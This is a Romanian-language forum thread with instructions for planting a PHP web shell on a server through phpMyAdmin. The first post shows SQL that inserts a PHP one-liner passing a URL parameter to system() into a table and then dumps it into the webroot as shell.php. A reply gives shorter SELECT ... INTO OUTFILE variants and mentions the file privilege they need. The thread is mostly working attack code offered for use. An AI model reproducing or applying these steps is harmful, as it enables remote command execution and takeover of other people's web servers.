Jump to content
Kalashnikov.

Upload shell cu phpmyadmin

Recommended Posts

Posted

Deci.. ai acces la phpmyadmin si vrei sa uploadezi un shell

Inainte de toate, trebuie sa afli webroot (calea), un exemplu:

/home/r00t/public_html/phpmyadmin/index.php

Poti gasi calea cu un fpd (easy-way).

Trebuie sa creeam un tabel, folosim sql:

CREATE TABLE `upload_db`.`form` (
`track1` VARCHAR( 1000 ) NOT NULL
) ENGINE = MYISAM ;

Introducem un cod in tabel:

INSERT INTO form VALUE ('some shell code here');

Pentru acest exemplu, voi uploada un script:

<?php if(isset($_GET['lol'])){echo "<h1>lol</h1><pre>"; system($_GET['lol']);exit;} ?>

comanda mea trebuie sa arate, ceva in genu:

INSERT INTO form VALUES ('<?php if(isset($_GET['lol'])){echo "<h1>lol</h1><pre>"; system($_GET['lol']);exit;} ?>');

Cu urmatoarea comanda, ii spunem serverului mysql sa exporte continutul tabelului intr-un fisier sa il putem executa

SELECT * INTO dumpfile '/path/to/web/page.php' FROM upload_db

comanda mea, ar trebui sa arate asa:

SELECT * INTO dumpfile '/home/r00t/public_html/shell.php' FROM upload_db

  • Upvote 1
  • Active Members
Posted
Nu trebuie sa te mai chinui sa faci tabel separat (util pentru cazul in care nu ai permisiuni sa o poti face), poti direct cu DUAL table
SELECT '<?php code here ?>' INTO OUTFILE '/../x.php' FROM DUAL

Insa asta cu INTO OUTFILE / DUMPFILE nu ar trebui sa mearga pe un normal user, n-ar trebui sa aibe permisii la FILE_PRIV un user normal, poate doar de pe root.

Merge si fara dual

select 'cod_php' INTO OUTFILE '/var/www/a.php'

sau DUMPFILE.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...